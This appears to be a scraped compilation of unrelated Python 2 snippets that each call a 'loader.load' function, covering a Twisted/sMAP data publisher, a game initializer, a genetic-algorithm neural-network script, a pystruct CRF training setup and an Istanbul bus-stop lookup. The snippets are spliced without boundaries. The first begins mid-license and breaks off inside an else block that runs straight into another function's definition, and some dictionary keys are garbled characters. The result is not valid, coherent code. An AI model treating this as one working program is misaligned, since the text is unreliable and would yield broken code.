STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
POSSIBILITY OF SUCH DAMAGE.
"""
"""
@author Stephen Dawson-Haggerty <*****@*****.**>
"""

# this is the twisted event loop
from twisted.internet import reactor

# use this to get a smap source in one line
import loader

# autoflush means that we don't call flush on a timer
s = loader.load('default.ini', autoflush=None)

CHUNKSIZE = 1000
i = 0

def fail(err):
    print "Received error while delivering reports"
    reactor.stop()

def do_add(*args):
    global i
    global CHUNKSIZE
    if i > 10000:
        reactor.stop()
    else:
        # publish a bunch of data
def __init__(self):
    ''' Initializes a new game to the start screen. '''
    self.finished = False
    self.scene = None
    self.microgames = loader.load(FAILFAST)
    self.change(Menu(self))
def load(info):
    loader.load(info)
import numpy as np
import math
import ann
import loader

inps = loader.load('paru.xlsx')
inps = loader.stringifyVar(inps, loader.normalizeVar(loader.getVar(inps)))
# inps = loader.loadDat('titanic.dat')

def fitness(kr):
    # return plus(kr)
    # print len(kr)
    return 1/(ann.epoch(inps, kr)+0.1)
    # return ann.epoch(inps,kr)

def plus(kr):
    return 1/((kr[0]+kr[1])+0.001)

def initKromosom(kl, interval):
    kr = np.array([(np.random.uniform()*(2*interval))-interval for i in xrange(kl)])
    # kr = []
    # for i in range(kl):
    #     kr.append((np.random.uniform()*(2*interval))-interval)
    return kr

def initPop(pops, kl, interval):
    pop = np.array([initKromosom(kl, interval) for i in xrange(pops)])
    # pop = []
    # for i in range(pops):
    #     pop.append(initKromosom(kl,interval))
    return pop
import random
import numpy as np
import util
import loader
from pystruct.models import ChainCRF
from pystruct.learners import (NSlackSSVM, OneSlackSSVM,
                               SubgradientSSVM, FrankWolfeSSVM)

directory = "/Users/thijs/dev/boilerplate/src/main/resources/dataset/"
featureset = "features3"

print("Load files")
features, labels = \
    loader.load(featureset+'.csv', 'labels.csv', directory)

# print("Shuffle results")
# features, labels = util.shuffle(features, labels)

trsize = int(0.7*len(labels))
X_train = features[1:trsize]
y_train = labels[1:trsize]
X_test = features[trsize+1:]
y_test = labels[trsize+1:]

# X_train = X_test = features
# y_train = y_test = labels
# trsize = len(labels)

# Evaluate the chain
# coding=utf-8
import loader
import pickle
import numpy as np
from create import *
import itertools

duraklar, next_stops, sr, routestops, k = loader.load()

print "durak", duraklar['L0139J']
print "durak", duraklar['�05A']
print "durak", duraklar['�15L']  # taksim

print "next stops", next_stops['L0168A']
print "next stops", next_stops['L0167B']
print "next stops", next_stops['L0166B']
print "next stops", next_stops['L0153D']
print "next stops", next_stops['A0617B']
print "next stops", next_stops['L0167B']

print "sr", sr['L0168A']
print "sr", sr['�15L']
print "sr", sr['L0152A']
print "sr", sr['L0152B']

print 'routestops', routestops['59N']
print "K", K(k, '59N', 'L0168A')